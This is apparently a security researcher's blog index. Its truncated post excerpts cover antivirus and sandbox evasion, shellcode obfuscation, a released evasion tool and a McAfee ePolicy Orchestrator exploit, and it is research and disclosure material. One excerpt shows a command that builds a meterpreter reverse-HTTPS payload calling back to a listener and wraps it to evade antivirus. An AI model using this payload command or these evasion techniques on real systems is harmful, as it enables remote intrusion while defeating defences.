100% Anti-Virus evasion with Metasploit browser exploits (example with ms11-003)
1. Introduction If Metasploit encoders are great tools to avoid Anti-virus detection of the Payload (meterpreter, reverse_tcp, …), it is not always so easy to avoid the “Exploit” detection. No. This...
Simple shellcode obfuscation
1. Introduction This article aims to provide you with the different steps needed to develop shellcode obfuscation techniques, and their respective deobfuscator assembly stubs. This should help you to...
Antivirus Sandbox Evasion (part1) – Preview
Hmmm, it seems that I wrote something very nice .. $ ./msfvenom -p windows/meterpreter/reverse_https -f raw LHOST=172.16.1.1 LPORT=443 \ | ./ultimate-payload.pl -t ultimate-payload-template1.exe -o...
Antivirus Sandbox Evasion (part2) – Slides
Hello, Here is the PowerPoint presentation explaining the sandbox evasion technique used in part 1 of this story (see Antivirus Sandbox Evasion (part1)). Enjoy, Note: There is a rating embedded...
Antivirus Sandbox Evasion (part3) – The Tool
Ok, here we are.. Thank you for your patience. It is time to release the version 0.1 of the “tool”.. ;-) The archive is composed of: An EXE template (ultimate-payload-template1.exe) which manages the...
Exploit: McAfee ePolicy 0wner (ePowner) – Preview
If you heard about the following vulnerabilities in McAfee ePolicy Orchestrator version 4.6.5 and earlier: CVE-2013-0140 – Pre-authenticated SQL injection CVE-2013-0141 – Pre-authenticated directory...
Turning your Antivirus into my botnet – OWASP Benelux 2013 – Slides
Below are the slides that I’ve presented at the OWASP Benelux day 2013 (Amsterdam). It covers partial results of my research about Managed Antivirus software, especially how I’ve chained multiple...